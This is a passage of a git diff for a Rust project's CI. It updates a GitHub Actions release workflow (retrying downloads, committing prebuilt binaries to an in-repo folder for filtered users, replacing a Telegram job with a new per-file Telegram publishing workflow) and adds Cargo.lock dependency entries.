+      # succeeds, the third nails any laggards. We use `gh run download`
+      # against the current run so we don't depend on the release page
+      # existing yet (it doesn't until the softprops step below runs).
+      - name: Download all build artifacts (with retries)
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          mkdir -p dist
+          for attempt in 1 2 3; do
+            if gh run download "${GITHUB_RUN_ID}" --dir dist --repo "${GITHUB_REPOSITORY}"; then
+              echo "downloaded all artifacts on attempt $attempt"
+              # `gh run download` puts each artifact in its own subdir;
+              # flatten so downstream steps that expect dist/<file> work
+              # the same as `merge-multiple: true` did.
+              find dist -type f -mindepth 2 -exec mv -f {} dist/ \;
+              find dist -type d -empty -delete
+              ls -la dist/
+              exit 0
+            fi
+            echo "download attempt $attempt failed; retrying in 30s..."
+            sleep 30
+          done
+          echo "::error::failed to download artifacts after 3 attempts"
+          exit 1
 
       # Compose the GitHub release body from `docs/changelog/v<ver>.md`
       # so the Releases page tells humans what actually changed —
@@ -608,8 +651,20 @@ jobs:
           fi
           {
             echo 'body<<__RELEASE_BODY_EOF__'
-            # Strip leading HTML comment that documents the file format.
-            sed -e '1{/^<!--/d;}' "$CHANGELOG"
+            # Strip leading HTML comment blocks (single-line OR multi-line)
+            # so the GitHub Release page sees only the body content, not
+            # the file-format header comment that every changelog has.
+            # Also strips any leading whitespace/blank lines that follow.
+            #
+            # Quoted heredoc (`<<'PY'`) so backticks/$ in the python
+            # snippet aren't shell-interpolated; CHANGELOG is passed in
+            # as an env var on the python invocation rather than via
+            # `$CHANGELOG` interpolation inside the heredoc.
+            CHANGELOG_PATH="$CHANGELOG" python3 - <<'PY'
+          import os, re, pathlib
+          body = pathlib.Path(os.environ["CHANGELOG_PATH"]).read_text(encoding="utf-8")
+          print(re.sub(r"^\s*(?:<!--.*?-->\s*)+", "", body, count=1, flags=re.S), end="")
+          PY
             echo
             echo '__RELEASE_BODY_EOF__'
           } >> "$GITHUB_OUTPUT"
@@ -636,84 +691,150 @@ jobs:
           append_body: true
           generate_release_notes: true
 
-  # Notify the Persian-speaking Telegram channel with the CI-built
-  # Android APK + its sha256 + the per-version changelog from
-  # `docs/changelog/v<tag>.md`.
-  #
-  # Two Telegram API calls:
-  #   1. sendDocument — APK file + a short caption (Telegram caps
-  #      captions at 1024 chars, and we have bigger changelogs than
-  #      that).
-  #   2. sendMessage — full changelog as a reply to #1, Persian
-  #      quote-block first then English, same pattern as the
-  #      previous manual post. No emojis, as the user asked.
-  #
-  # Needs two repo secrets:
-  #   TELEGRAM_BOT_TOKEN  — bot the channel admits as poster
-  #   TELEGRAM_CHAT_ID    — numeric chat id (starts with -100...)
-  # Missing either => the whole job is skipped (not failed) so a
-  # forker who hasn't set up a Telegram channel gets a clean release.
-  telegram:
-    needs: [android, release]
+  # Refresh the in-repo `releases/` folder with the latest pre-built
+  # artifacts so users behind GitHub-Releases-page filtering (the IR
+  # state network filters the dynamic /releases/ URL but not the static
+  # `Code → Download ZIP` of the source tree) can still download.
+  # Practice was started pre-v1.1.0, dropped, then resumed at user
+  # request after a Telegram-channel suggestion: "فقط داخل پوشه ریلیز
+  # پروژه اپلود بکن — مشکل دانلود حل میشه — راحت میشه از گیتهاب دانلود
+  # کرد." The folder holds ONLY the latest version (replace, not
+  # archive); each tag refresh overwrites the previous artifacts. The
+  # existing release-page workflow keeps versioned artifacts behind
+  # `https://github.com/.../releases/tag/v...` for users who can reach
+  # that URL — this in-repo folder is the fallback for users who can't.
+  commit-releases:
+    needs: [build, android, release]
     runs-on: ubuntu-latest
-    # Gated on the repo variable `TELEGRAM_NOTIFY_ENABLED`. Default is
-    # OFF — the job skips silently unless the variable is set to the
-    # literal string "true". Toggle via:
-    #
-    #     gh variable set TELEGRAM_NOTIFY_ENABLED --body true
-    #     gh variable set TELEGRAM_NOTIFY_ENABLED --body false
-    #
-    # Keeping the machinery (script + secrets) in place so flipping
-    # the switch back on is a one-liner, not a workflow edit.
-    if: ${{ vars.TELEGRAM_NOTIFY_ENABLED == 'true' && needs.android.result == 'success' }}
+    permissions:
+      contents: write
     steps:
+      # Always check out main, not the tag — we're committing back to
+      # the moving branch. fetch-depth 0 so `git push origin HEAD:main`
+      # has the lineage to fast-forward.
       - uses: actions/checkout@v4
-
-      - uses: actions/download-artifact@v4
         with:
-          name: mhrv-rs-android-universal
-          path: apk
+          ref: main
+          fetch-depth: 0
 
-      - name: Post to Telegram
+      # Pull artifacts from the GitHub Release page (which the `release`
+      # job populated a few seconds earlier) rather than the workflow
+      # artifacts API. The artifacts API path —
+      # `actions/download-artifact@v4` with `merge-multiple: true` —
+      # has been failing with "artifact download failed after 5
+      # retries" on one of the ~13 artifacts on multiple consecutive
+      # runs (v1.7.5 retrigger, v1.7.6). The 10 fast downloads that
+      # complete first all succeed; the 11th-13th hit the error.
+      # `gh release download` reads from GitHub's Release-page CDN,
+      # which is independent of the artifacts blob store and has a
+      # different retry / rate-limit profile. Same files, more
+      # reliable surface.
+      - name: Download artifacts from the GitHub Release page
         env:
-          BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
-          CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
-          INCLUDE_CHANGELOG: ${{ vars.TELEGRAM_INCLUDE_CHANGELOG }}
-        # Python over curl/bash so we don't have to fight curl's -F
-        # value-interpretation rules. curl treats `-F "caption=<..."`
-        # as "read the caption from file named ..." when the value
-        # starts with `<`, which matches our `<b>` HTML-bold tags and
-        # silently turns the whole job into a "file not found" exit
-        # 26. Python stdlib has no such wart.
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          VER="${{ inputs.version || github.ref_name }}"
+          # Strip leading `v` to normalize, then re-add — the Release
+          # tag is `vX.Y.Z`, but for the rest of the workflow we use
+          # bare `X.Y.Z`. Mirror the same pattern here so a downstream
+          # readme update can use the bare version.
+          VER="${VER#v}"
+          mkdir -p artifacts
+          gh release download "v${VER}" \
+            --repo "${{ github.repository }}" \
+            --dir artifacts \
+            --pattern '*.tar.gz' \
+            --pattern '*.zip' \
+            --pattern '*.apk'
+          echo "--- artifacts/ contents ---"
+          ls -la artifacts/
+
+      - name: Refresh releases/ folder
         run: |
           set -euo pipefail
           VER="${{ inputs.version || github.ref_name }}"
           VER="${VER#v}"
-          APK="apk/mhrv-rs-android-universal-v${VER}.apk"
 
-          if [ -z "${BOT_TOKEN:-}" ] || [ -z "${CHAT_ID:-}" ]; then
-            echo "::notice::TELEGRAM_BOT_TOKEN / TELEGRAM_CHAT_ID not set, skipping Telegram post"
-            exit 0
-          fi
+          mkdir -p releases
+
+          # Wipe old binary artifacts (.apk, .tar.gz, .zip) but keep
+          # README.md and .gitattributes — those are folder-level docs
+          # that stay constant across versions and shouldn't be
+          # regenerated on every release.
+          find releases -maxdepth 1 -type f \
+            \( -name '*.apk' -o -name '*.tar.gz' -o -name '*.zip' \) \
+            -delete
+
+          # Copy desktop archives. Their names already include the
+          # platform identifier (mhrv-rs-linux-amd64.tar.gz, etc.) and
+          # are version-stable — no rename needed.
+          for f in artifacts/*.tar.gz artifacts/*.zip; do
+            [ -f "$f" ] || continue
+            cp "$f" "releases/$(basename "$f")"
+          done
 
-          if [ ! -f "$APK" ]; then
-            echo "::error::expected $APK to exist; got:"
-            ls -la apk/
-            exit 1
+          # Android APKs come with the version baked into the name
+          # (mhrv-rs-android-universal-v1.7.5.apk). Copy all of them so
+          # users on slow connections can grab a per-ABI APK (~37 MB)
+          # instead of the universal (~110 MB).
+          for f in artifacts/mhrv-rs-android-*.apk; do
+            [ -f "$f" ] || continue
+            cp "$f" "releases/$(basename "$f")"
+          done
+
+          # Update the "Current version" line in releases/README.md
+          # (both English and Persian copies) and APK filename refs so
+          # the doc stays accurate. `sed -i` BSD/GNU compatibility is
+          # handled by passing an empty extension explicitly — runner
+          # is Linux so `-i` alone works, but the empty-string form
+          # also works on macOS for anyone running this locally.
+          if [ -f releases/README.md ]; then
+            sed -i.bak \
+              -e "s/Current version: \*\*v[0-9][0-9.]*\*\*/Current version: **v${VER}**/" \
+              -e "s/نسخهٔ فعلی: \*\*v[0-9][0-9.]*\*\*/نسخهٔ فعلی: **v${VER}**/" \
+              -e "s/mhrv-rs-android-universal-v[0-9][0-9.]*\.apk/mhrv-rs-android-universal-v${VER}.apk/g" \
+              releases/README.md
+            rm -f releases/README.md.bak
           fi
 
-          # --with-changelog is opt-in. Default post is just the APK
-          # plus a short caption with the SHA-256, repo URL, and release
-          # URL — no long body. To include the Persian/English bullets
-          # for a specific tag, set the repo variable
-          # TELEGRAM_INCLUDE_CHANGELOG=true before pushing that tag.
-          INCLUDE_CHANGELOG_FLAG=""
-          if [ "${INCLUDE_CHANGELOG:-}" = "true" ]; then
-            INCLUDE_CHANGELOG_FLAG="--with-changelog"
+          echo "--- releases/ contents after refresh ---"
+          ls -la releases/
+
+      - name: Commit + push to main
+        run: |
+          set -euo pipefail
+          VER="${{ inputs.version || github.ref_name }}"
+          VER="${VER#v}"
+
+          git config user.name "github-actions[bot]"
+          git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
+
+          git add releases
+          if git diff --cached --quiet; then
+            echo "No releases/ changes to commit (artifacts identical to current HEAD?)."
+            exit 0
           fi
-          python3 .github/scripts/telegram_release_notify.py \
-            --apk "$APK" \
-            --version "$VER" \
-            --repo "$GITHUB_REPOSITORY" \
-            --changelog "docs/changelog/v${VER}.md" \
-            $INCLUDE_CHANGELOG_FLAG
+
+          git commit -m "chore(releases): refresh prebuilt binaries for v${VER}" \
+                     -m "Auto-committed by release workflow so users behind GitHub-Releases-page filtering can download via the in-repo releases/ folder. The GitHub Release page itself still has the canonical versioned artifacts; this folder is the fallback path for users who can only reach the static source tree (Code → Download ZIP)."
+
+          # Push to main. The release workflow runs on the tag commit,
+          # which is reachable from main as a fast-forward — push is
+          # straightforward, no force needed. Tag protection rules
+          # apply to refs/tags/* not refs/heads/main, so this push
+          # isn't gated by the same protection.
+          git push origin HEAD:main
+
+  # The legacy `telegram` job that posted a universal APK + changelog
+  # bundle to the main Telegram channel was removed in v1.9.4. It was
+  # superseded by `.github/workflows/telegram-publish-files.yml` (per-
+  # platform per-file posts to the files channel + a single cross-link
+  # to the main channel). With both running together, every release
+  # produced a duplicate APK post on the main channel — the legacy
+  # bundled post AND the new cross-link.
+  #
+  # If you ever need to bring back the bundled-APK-on-main pattern, the
+  # commit history before v1.9.4 has the full job — `git log -- .github/workflows/release.yml`.
+  # The `TELEGRAM_NOTIFY_ENABLED` repo variable + `telegram_release_notify.py`
+  # script that the legacy job called are no longer referenced.
diff --git a/.github/workflows/telegram-publish-files.yml b/.github/workflows/telegram-publish-files.yml
new file mode 100644
index 00000000..f78b548e
--- /dev/null
+++ b/.github/workflows/telegram-publish-files.yml
@@ -0,0 +1,145 @@
+name: Telegram publish release files
+
+# Posts every release artifact (Android APKs, Windows ZIP, macOS, Linux,
+# OpenWRT, Raspbian) to the Telegram channel as individual messages with
+# Persian captions and a #v<MAJOR><MINOR><PATCH> hashtag. Files larger
+# than the bot API's 50 MB ceiling are split into ~45 MB byte chunks
+# server-side and posted as `<name>.part_aa`, `.part_ab`, ... — recipients
+# reassemble with `cat <name>.part_* > <name>`.
+#
+# This workflow is decoupled from `release.yml` so it can be re-triggered
+# for any historical tag (e.g. to re-post v1.8.0 after a Telegram channel
+# wipe) without rebuilding artifacts. It downloads from the GitHub Release
+# page directly via `gh release download`, so the assets must already
+# exist there.
+
+on:
+  workflow_dispatch:
+    inputs:
+      version:
+        description: 'Release tag to publish (with or without the v prefix, e.g. 1.8.0 or v1.8.0)'
+        required: true
+        type: string
+  # Auto-trigger after a successful `release` workflow run. Posts files
+  # to Telegram once the release page exists. The `head_branch` of the
+  # triggering run is the tag name (e.g. `v1.8.0`) on tag-pushed releases,
+  # which is what we feed `gh release download`.
+  workflow_run:
+    workflows: [release]
+    types: [completed]
+
+permissions:
+  contents: read
+
+jobs:
+  publish:
+    # Skip when triggered by a `release` run that didn't succeed — no
+    # point posting half a release. Manual `workflow_dispatch` always
+    # runs (the user explicitly asked for it).
+    if: |
+      github.event_name == 'workflow_dispatch'
+      || github.event.workflow_run.conclusion == 'success'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          # Sparse checkout would be nicer but stock checkout is fast
+          # enough for a 5 MB workflow file + ~200 KB script.
+          fetch-depth: 1
+
+      - name: Resolve version + hashtag
+        id: ver
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          if [ -n "${{ inputs.version || '' }}" ]; then
+            VER="${{ inputs.version }}"
+          else
+            # workflow_run path. `head_branch` for a tag-pushed release
+            # workflow is the tag name (e.g. `v1.8.0`).
+            VER="${{ github.event.workflow_run.head_branch || '' }}"
+          fi
+          if [ -z "$VER" ]; then
+            echo "::error::could not determine version from inputs or workflow_run trigger"
+            exit 1
+          fi
+          # Strip the leading `v` if present.
+          VER="${VER#v}"
+          # Hashtag: `#v` + version with dots removed. So 1.8.0 → #v180,
+          # 1.8.10 → #v1810, 2.0.0 → #v200. Predictable across releases.
+          HASHTAG="#v$(echo "$VER" | tr -d '.')"
+          echo "version=$VER" >> "$GITHUB_OUTPUT"
+          echo "hashtag=$HASHTAG" >> "$GITHUB_OUTPUT"
+          echo "Resolved: version=$VER  hashtag=$HASHTAG"
+
+      - name: Download release assets
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          mkdir -p assets
+          # Mirror the retry pattern from `release.yml`'s download step —
+          # GitHub's release-asset CDN occasionally times out on cold
+          # tags. Three attempts with 30 s backoff covers most flakes.
+          #
+          # `--clobber` overwrites any partial files left behind by a
+          # previous failed attempt — without it, attempt 2/3 would error
+          # with "already exists" the moment any single asset finished
+          # downloading on attempt 1 before the CDN timed out (the v1.9.2
+          # publish hit exactly this — HTTP 500 mid-download, then attempts
+          # 2/3 failed on "already exists" for the assets that did finish).
+          for attempt in 1 2 3; do
+            if gh release download "v${{ steps.ver.outputs.version }}" \
+                 --dir assets \
+                 --clobber \
+                 --repo "${GITHUB_REPOSITORY}"; then
+              echo "downloaded release assets on attempt $attempt"
+              ls -la assets/
+              exit 0
+            fi
+            echo "attempt $attempt failed; retrying in 30s..."
+            sleep 30
+          done
+          echo "::error::failed to download release assets after 3 attempts"
+          exit 1
+
+      - name: Publish files to Telegram channel
+        env:
+          BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
+          # The files channel — supergroup-style negative ID, hard-coded
+          # rather than templated as a repo variable because there's only
+          # ever one of these and putting it in source makes the workflow
+          # auditable. The bot token already has post permissions there.
+          CHAT_ID: '-1003966234444'
+          # The main announcement channel. Receives a single cross-link
+          # message per release pointing at the file-channel anchor post,
+          # instead of the previous behaviour of attaching the universal
+          # APK + full changelog. Sourced from the same secret the
+          # legacy `telegram` job in release.yml used.
+          MAIN_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
+          # Public-username form of the files channel link. Used for
+          # both (a) the post-link in the main-channel cross-post — so
+          # `t.me/<name>/<msg>` works for everyone, not just members
+          # via `t.me/c/<id>/<msg>` — and (b) one of the two
+          # channel-join links rendered at the bottom of the cross-post.
+          # Defaults to `mhrv_rs` (current public username); override via
+          # repo variable if the channel is renamed.
+          FILES_CHANNEL_USERNAME: ${{ vars.FILES_CHANNEL_USERNAME || 'mhrv_rs' }}
+          # `t.me/+<hash>` invite link for the files channel. Rendered
+          # as the second channel-join option in the main-channel
+          # cross-post — the only join path that works for users coming
+          # from outside Telegram search (private/restricted channels)
+          # or whose Telegram client doesn't resolve usernames cleanly.
+          # Override via repo variable if the channel's invite hash is
+          # rotated.
+          FILES_CHANNEL_INVITE: ${{ vars.FILES_CHANNEL_INVITE || 'https://t.me/+R1OyoHX2boA1ZDgx' }}
+        run: |
+          if [ -z "${BOT_TOKEN:-}" ]; then
+            echo "::error::TELEGRAM_BOT_TOKEN not set; can't publish"
+            exit 1
+          fi
+          python3 .github/scripts/telegram_publish_files.py \
+            --assets-dir assets \
+            --version "${{ steps.ver.outputs.version }}" \
+            --hashtag "${{ steps.ver.outputs.hashtag }}"
diff --git a/Cargo.lock b/Cargo.lock
index 66a711c2..74a16ffb 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -28,6 +28,71 @@ dependencies = [
  "serde",
 ]
 
+[[package]]
+name = "accesskit_consumer"
+version = "0.16.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8c17cca53c09fbd7288667b22a201274b9becaa27f0b91bf52a526db95de45e6"
+dependencies = [
+ "accesskit",
+]
+
+[[package]]
+name = "accesskit_macos"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cd3b6ae1eabbfbced10e840fd3fce8a93ae84f174b3e4ba892ab7bcb42e477a7"
+dependencies = [
+ "accesskit",
+ "accesskit_consumer",
+ "objc2 0.3.0-beta.3.patch-leaks.3",
+ "once_cell",
+]
+
+[[package]]
+name = "accesskit_unix"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09f46c18d99ba61ad7123dd13eeb0c104436ab6af1df6a1cd8c11054ed394a08"
+dependencies = [
+ "accesskit",
+ "accesskit_consumer",
+ "async-channel",
+ "async-once-cell",
+ "atspi",
+ "futures-lite 1.13.0",
+ "once_cell",
+ "serde",
+ "zbus",
+]
+
+[[package]]
+name = "accesskit_windows"
+version = "0.15.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "afcae27ec0974fc7c3b0b318783be89fd1b2e66dd702179fe600166a38ff4a0b"
+dependencies = [
+ "accesskit",
+ "accesskit_consumer",
+ "once_cell",
+ "paste",
+ "static_assertions",
+ "windows 0.48.0",
+]
+
+[[package]]
+name = "accesskit_winit"
+version = "0.16.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5284218aca17d9e150164428a0ebc7b955f70e3a9a78b4c20894513aabf98a67"
+dependencies = [
+ "accesskit",
+ "accesskit_macos",
+ "accesskit_unix",
+ "accesskit_windows",
+ "winit",
+]
+
 [[package]]
 name = "adler2"
 version = "2.0.1"
@@ -160,6 +225,12 @@ dependencies = [
  "windows-sys 0.61.2",
 ]
 
+[[package]]
+name = "anyhow"
+version = "1.0.102"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c"
+
 [[package]]
 name = "arboard"
 version = "3.6.1"
@@ -173,7 +244,7 @@ dependencies = [
  "objc2-foundation 0.3.2",
  "parking_lot",
  "percent-encoding",
- "windows-sys 0.52.0",
+ "windows-sys 0.60.2",
  "x11rb",
 ]
 
@@ -237,6 +308,16 @@ dependencies = [
  "syn 2.0.117",
 ]
 
+[[package]]
+name = "async-broadcast"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7c48ccdbf6ca6b121e0f586cbc0e73ae440e56c67c30fa0873b4e110d9c26d2b"
+dependencies = [
+ "event-listener 2.5.3",
+ "futures-core",
+]
+
 [[package]]
 name = "async-channel"
 version = "2.5.0"
@@ -249,6 +330,142 @@ dependencies = [
  "pin-project-lite",
 ]
 
+[[package]]
+name = "async-executor"
+version = "1.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c96bf972d85afc50bf5ab8fe2d54d1586b4e0b46c97c50a0c9e71e2f7bcd812a"
+dependencies = [
+ "async-task",
+ "concurrent-queue",
+ "fastrand 2.4.1",
+ "futures-lite 2.6.1",
+ "pin-project-lite",
+ "slab",
+]
+
+[[package]]
+name = "async-fs"
+version = "1.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "279cf904654eeebfa37ac9bb1598880884924aab82e290aa65c9e77a0e142e06"
+dependencies = [
+ "async-lock 2.8.0",
+ "autocfg",
+ "blocking",
+ "futures-lite 1.13.0",
+]
+
+[[package]]
+name = "async-io"
+version = "1.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0fc5b45d93ef0529756f812ca52e44c221b35341892d3dcc34132ac02f3dd2af"
+dependencies = [
+ "async-lock 2.8.0",
+ "autocfg",
+ "cfg-if",
+ "concurrent-queue",
+ "futures-lite 1.13.0",
+ "log",
+ "parking",
+ "polling 2.8.0",
+ "rustix 0.37.28",
+ "slab",
+ "socket2 0.4.10",
+ "waker-fn",
+]
+
+[[package]]
+name = "async-io"
+version = "2.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "456b8a8feb6f42d237746d4b3e9a178494627745c3c56c6ea55d92ba50d026fc"
+dependencies = [
+ "autocfg",
+ "cfg-if",
+ "concurrent-queue",
+ "futures-io",
+ "futures-lite 2.6.1",
+ "parking",
+ "polling 3.11.0",
+ "rustix 1.1.4",
+ "slab",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "async-lock"
+version = "2.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "287272293e9d8c41773cec55e365490fe034813a2f172f502d6ddcf75b2f582b"
+dependencies = [
+ "event-listener 2.5.3",
+]
+
+[[package]]
+name = "async-lock"
+version = "3.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "290f7f2596bd5b78a9fec8088ccd89180d7f9f55b94b0576823bbbdc72ee8311"
+dependencies = [
+ "event-listener 5.4.1",
+ "event-listener-strategy",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-once-cell"
+version = "0.5.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4288f83726785267c6f2ef073a3d83dc3f9b81464e9f99898240cced85fce35a"
+
+[[package]]
+name = "async-process"
+version = "1.8.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ea6438ba0a08d81529c69b36700fa2f95837bfe3e776ab39cde9c14d9149da88"
+dependencies = [
+ "async-io 1.13.0",
+ "async-lock 2.8.0",
+ "async-signal",
+ "blocking",
+ "cfg-if",
+ "event-listener 3.1.0",
+ "futures-lite 1.13.0",
+ "rustix 0.38.44",
+ "windows-sys 0.48.0",
+]
+
+[[package]]
+name = "async-recursion"
+version = "1.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b43422f69d8ff38f95f1b2bb76517c91589a924d1559a0e935d7c8ce0274c11"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "async-signal"
+version = "0.2.13"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "43c070bbf59cd3570b6b2dd54cd772527c7c3620fce8be898406dd3ed6adc64c"
+dependencies = [
+ "async-io 2.6.0",
+ "async-lock 3.4.2",
+ "atomic-waker",
+ "cfg-if",
+ "futures-core",
+ "futures-io",
+ "rustix 1.1.4",
+ "signal-hook-registry",
+ "slab",
+ "windows-sys 0.61.2",
+]
+
 [[package]]
 name = "async-task"
 version = "4.7.1"
@@ -272,6 +489,54 @@ version = "1.1.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0"
 
+[[package]]
+name = "atspi"
+version = "0.19.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6059f350ab6f593ea00727b334265c4dfc7fd442ee32d264794bd9bdc68e87ca"
+dependencies = [
+ "atspi-common",
+ "atspi-connection",
+ "atspi-proxies",
+]
+
+[[package]]
+name = "atspi-common"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92af95f966d2431f962bc632c2e68eda7777330158bf640c4af4249349b2cdf5"
+dependencies = [
+ "enumflags2",
+ "serde",
+ "static_assertions",
+ "zbus",
+ "zbus_names",
+ "zvariant",
+]
+
+[[package]]
+name = "atspi-connection"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a0c65e7d70f86d4c0e3b2d585d9bf3f979f0b19d635a336725a88d279f76b939"
+dependencies = [
+ "atspi-common",
+ "atspi-proxies",
+ "futures-lite 1.13.0",
+ "zbus",
+]
+
+[[package]]
+name = "atspi-proxies"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6495661273703e7a229356dcbe8c8f38223d697aacfaf0e13590a9ac9977bb52"
+dependencies = [
+ "atspi-common",
+ "serde",
+ "zbus",
+]
+
 [[package]]
 name = "autocfg"
 version = "1.5.0"
@@ -361,13 +626,32 @@ dependencies = [
  "generic-array",
 ]
 
+[[package]]
+name = "block-sys"
+version = "0.1.0-beta.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0fa55741ee90902547802152aaf3f8e5248aab7e21468089560d4c8840561146"
+dependencies = [
+ "objc-sys 0.2.0-beta.2",
+]
+
 [[package]]
 name = "block-sys"
 version = "0.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ae85a0696e7ea3b835a453750bf002770776609115e6d25c6d2ff28a8200f7e7"
 dependencies = [
- "objc-sys",
+ "objc-sys 0.3.5",
+]
+
+[[package]]
+name = "block2"
+version = "0.2.0-alpha.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8dd9e63c1744f755c2f60332b88de39d341e5e86239014ad839bd71c106dec42"
+dependencies = [
+ "block-sys 0.1.0-beta.1",
+ "objc2-encode 2.0.0-pre.2",
 ]
 
 [[package]]
@@ -376,7 +660,7 @@ version = "0.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "15b55663a85f33501257357e6421bb33e769d5c9ffb5ba0921c975a123e35e68"
 dependencies = [
- "block-sys",
+ "block-sys 0.2.1",
  "objc2 0.4.1",
 ]
 
@@ -398,7 +682,7 @@ dependencies = [
  "async-channel",
  "async-task",
  "futures-io",
- "futures-lite",
+ "futures-lite 2.6.1",
  "piper",
 ]
 
@@ -428,6 +712,12 @@ dependencies = [
  "syn 2.0.117",
 ]
 
+[[package]]
+name = "byteorder"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
+
 [[package]]
 name = "byteorder-lite"
 version = "0.1.0"
@@ -468,7 +758,7 @@ checksum = "fba7adb4dd5aa98e5553510223000e7148f621165ec5f9acd7113f6ca4995298"
 dependencies = [
  "bitflags 2.11.1",
  "log",
- "polling",
+ "polling 3.11.0",
  "rustix 0.38.44",
  "slab",
  "thiserror 1.0.69",
@@ -481,7 +771,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "4dbf9978365bac10f54d1d4b04f7ce4427e51f71d61f2fe15e3fed5166474df7"
 dependencies = [
  "bitflags 2.11.1",
- "polling",
+ "polling 3.11.0",
  "rustix 1.1.4",
  "slab",
  "tracing",
@@ -556,6 +846,17 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "chacha20"
+version = "0.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6f8d983286843e49675a4b7a2d174efe136dc93a18d69130dd18198a6c167601"
+dependencies = [
+ "cfg-if",
+ "cpufeatures 0.3.0",
+ "rand_core 0.10.1",
+]
+
 [[package]]
 name = "chrono"
 version = "0.4.44"
@@ -753,6 +1054,15 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "cpufeatures"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8b2a41393f66f16b0823bb79094d54ac5fbd34ab292ddafb9a0456ac9f87d201"
+dependencies = [
+ "libc",
+]
+
 [[package]]
 name = "crc32fast"
 version = "1.5.0"
@@ -839,6 +1149,17 @@ dependencies = [
  "powerfmt",
 ]
 
+[[package]]
+name = "derivative"
+version = "2.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fcc3dd5e9e9c0b295d6e1e4d811fb6f157d5ffd784b8d202fc62eac8035a770b"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
 [[package]]
 name = "digest"
 version = "0.10.7"
@@ -1032,6 +1353,7 @@ version = "0.28.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "fac4e066af341bf92559f60dbdf2020b2a03c963415349af5f3f8d79ff7a4926"
 dependencies = [
+ "accesskit_winit",
  "ahash",
  "arboard",
  "egui",
@@ -1055,7 +1377,7 @@ dependencies = [
  "egui",
  "glow",
  "log",
- "memoffset",
+ "memoffset 0.9.1",
  "wasm-bindgen",
  "web-sys",
 ]
@@ -1071,12 +1393,21 @@ dependencies = [
 ]
 
 [[package]]
-name = "enum-as-inner"
-version = "0.6.1"
+name = "enumflags2"
+version = "0.7.12"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc"
+checksum = "1027f7680c853e056ebcec683615fb6fbbc07dbaa13b4d5d9442b146ded4ecef"
+dependencies = [
+ "enumflags2_derive",
+ "serde",
+]
+
+[[package]]
+name = "enumflags2_derive"
+version = "0.7.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "67c78a4d8fdf9953a5c9d458f9efe940fd97a0cab0941c075a813ac594733827"
 dependencies = [
- "heck",
  "proc-macro2",
  "quote",
  "syn 2.0.117",
@@ -1174,6 +1505,23 @@ dependencies = [
  "arrayvec",
 ]
 
+[[package]]
+name = "event-listener"
+version = "2.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0206175f82b8d6bf6652ff7d71a1e27fd2e4efde587fd368662814d6ec1d9ce0"
+
+[[package]]
